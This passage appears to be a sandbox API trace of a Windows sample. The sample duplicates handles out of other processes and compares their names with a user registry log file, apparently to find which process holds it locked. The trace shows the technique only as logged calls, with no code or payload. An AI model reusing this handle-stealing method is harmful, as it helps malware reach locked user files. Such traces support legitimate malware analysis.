| out: lpThreadId=0x0) returned 0x1e4 [0161.546] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.547] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.547] CloseHandle (hObject=0x1e4) returned 1 [0161.547] _wcsicmp (_Str1="\\lsass", _Str2="\\ntuser.dat.LOG1") returned -2 [0161.547] CloseHandle (hObject=0x194) returned 1 [0161.547] CloseHandle (hObject=0x1e8) returned 1 [0161.548] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0161.548] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x42c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.548] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.548] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.549] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.550] CloseHandle (hObject=0x1e4) returned 1 [0161.550] _wcsicmp (_Str1="\\srvsvc", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.550] CloseHandle (hObject=0x194) returned 1 [0161.550] CloseHandle (hObject=0x1e8) returned 1 [0161.550] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.550] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.550] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.551] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.552] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.552] CloseHandle (hObject=0x1e4) returned 1 [0161.552] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.552] CloseHandle (hObject=0x194) returned 1 [0161.552] CloseHandle (hObject=0x1e8) returned 1 [0161.552] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.552] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.553] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.554] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.554] CloseHandle (hObject=0x1e4) returned 1 [0161.554] CloseHandle (hObject=0x194) returned 1 [0161.554] CloseHandle (hObject=0x1e8) returned 1 [0161.554] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.554] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.555] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.555] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.556] CloseHandle (hObject=0x1e4) returned 1 [0161.556] CloseHandle (hObject=0x194) returned 1 [0161.556] CloseHandle (hObject=0x1e8) returned 1 [0161.556] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.556] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.556] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.557] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.557] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.557] CloseHandle (hObject=0x1e4) returned 1 [0161.558] CloseHandle (hObject=0x194) returned 1 [0161.558] CloseHandle (hObject=0x1e8) returned 1 [0161.558] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.558] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.558] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.559] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.559] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.559] CloseHandle (hObject=0x1e4) returned 1 [0161.560] CloseHandle (hObject=0x194) returned 1 [0161.560] CloseHandle (hObject=0x1e8) returned 1 [0161.560] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.560] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.561] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.562] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.562] CloseHandle (hObject=0x1e4) returned 1 [0161.562] CloseHandle (hObject=0x194) returned 1 [0161.562] CloseHandle (hObject=0x1e8) returned 1 [0161.562] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.562] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.562] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.563] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.563] CloseHandle (hObject=0x1e4) returned 1 [0161.563] CloseHandle (hObject=0x194) returned 1 [0161.563] CloseHandle (hObject=0x1e8) returned 1 [0161.564] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.564] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.565] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.566] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.566] CloseHandle (hObject=0x1e4) returned 1 [0161.566] CloseHandle (hObject=0x194) returned 1 [0161.566] CloseHandle (hObject=0x1e8) returned 1 [0161.566] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.566] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.566] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.567] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.567] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.567] CloseHandle (hObject=0x1e4) returned 1 [0161.567] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -8 [0161.567] CloseHandle (hObject=0x194) returned 1 [0161.568] CloseHandle (hObject=0x1e8) returned 1 [0161.568] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.568] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.569] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.569] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.569] CloseHandle (hObject=0x1e4) returned 1 [0161.569] CloseHandle (hObject=0x194) returned 1 [0161.570] CloseHandle (hObject=0x1e8) returned 1 [0161.570] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.570] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.571] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.571] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.571] CloseHandle (hObject=0x1e4) returned 1 [0161.572] CloseHandle (hObject=0x194) returned 1 [0161.572] CloseHandle (hObject=0x1e8) returned 1 [0161.572] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0161.572] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.572] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.576] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.578] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.578] CloseHandle (hObject=0x1e4) returned 1 [0161.578] CloseHandle (hObject=0x194) returned 1 [0161.578] CloseHandle (hObject=0x1e8) returned 1 [0161.578] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0161.578] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.578] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.579] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.580] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.580] CloseHandle (hObject=0x1e4) returned 1 [0161.580] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.580] CloseHandle (hObject=0x194) returned 1 [0161.580] CloseHandle (hObject=0x1e8) returned 1 [0161.580] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0161.580] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.580] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.582] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.585] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.585] CloseHandle (hObject=0x1e4) returned 1 [0161.585] CloseHandle (hObject=0x194) returned 1 [0161.585] CloseHandle (hObject=0x1e8) returned 1 [0161.585] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0161.585] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.585] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.586] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.587] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.587] CloseHandle (hObject=0x1e4) returned 1 [0161.587] CloseHandle (hObject=0x194) returned 1 [0161.587] CloseHandle (hObject=0x1e8) returned 1 [0161.587] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0161.587] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.591] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.603] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.603] CloseHandle (hObject=0x1e4) returned 1 [0161.603] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.603] CloseHandle (hObject=0x194) returned 1 [0161.604] CloseHandle (hObject=0x1e8) returned 1 [0161.604] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0161.604] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x238, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.604] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.604] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.611] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.611] CloseHandle (hObject=0x1e4) returned 1 [0161.611] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.611] CloseHandle (hObject=0x194) returned 1 [0161.611] CloseHandle (hObject=0x1e8) returned 1 [0161.611] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x1e8 [0161.611] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.612] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.613] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.613] CloseHandle (hObject=0x1e4) returned 1 [0161.613] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.613] CloseHandle (hObject=0x194) returned 1 [0161.613] CloseHandle (hObject=0x1e8) returned 1 [0161.613] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x1e8 [0161.613] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x68, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.614] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.615] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.615] CloseHandle (hObject=0x1e4) returned 1 [0161.615] CloseHandle (hObject=0x194) returned 1 [0161.615] CloseHandle (hObject=0x1e8) returned 1 [0161.615] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x360) returned 0x1e8 [0161.615] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.615] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.616] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.617] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.617] CloseHandle (hObject=0x1e4) returned 1 [0161.617] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.617] CloseHandle (hObject=0x194) returned 1 [0161.617] CloseHandle (hObject=0x1e8) returned 1 [0161.617] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x360) returned 0x1e8 [0161.617] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.617] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.618] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.619] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.619] CloseHandle (hObject=0x1e4) returned 1 [0161.619] _wcsicmp (_Str1="\\Common Files", _Str2="\\ntuser.dat.LOG1") returned -11 [0161.619] CloseHandle (hObject=0x194) returned 1 [0161.619] CloseHandle (hObject=0x1e8) returned 1 [0161.619] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6f4) returned 0x1e8 [0161.619] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.619] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.620] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.620] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.620] CloseHandle (hObject=0x1e4) returned 1 [0161.620] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.620] CloseHandle (hObject=0x194) returned 1 [0161.620] CloseHandle (hObject=0x1e8) returned 1 [0161.621] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6f4) returned 0x1e8 [0161.621] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.621] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.621] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.622] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.622] CloseHandle (hObject=0x1e4) returned 1 [0161.622] _wcsicmp (_Str1="\\Microsoft Visual Studio 8", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.622] CloseHandle (hObject=0x194) returned 1 [0161.622] CloseHandle (hObject=0x1e8) returned 1 [0161.622] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1e8 [0161.622] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.623] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.624] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.624] CloseHandle (hObject=0x1e4) returned 1 [0161.624] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.624] CloseHandle (hObject=0x194) returned 1 [0161.624] CloseHandle (hObject=0x1e8) returned 1 [0161.624] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1e8 [0161.624] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.624] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.625] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.626] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.626] CloseHandle (hObject=0x1e4) returned 1 [0161.626] _wcsicmp (_Str1="\\Common Files", _Str2="\\ntuser.dat.LOG1") returned -11 [0161.626] CloseHandle (hObject=0x194) returned 1 [0161.626] CloseHandle (hObject=0x1e8) returned 1 [0161.626] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc0) returned 0x1e8 [0161.626] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.627] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.628] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.628] CloseHandle (hObject=0x1e4) returned 1 [0161.628] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.628] CloseHandle (hObject=0x194) returned 1 [0161.628] CloseHandle (hObject=0x1e8) returned 1 [0161.628] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc0) returned 0x1e8 [0161.628] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.628] CreateThread (in: 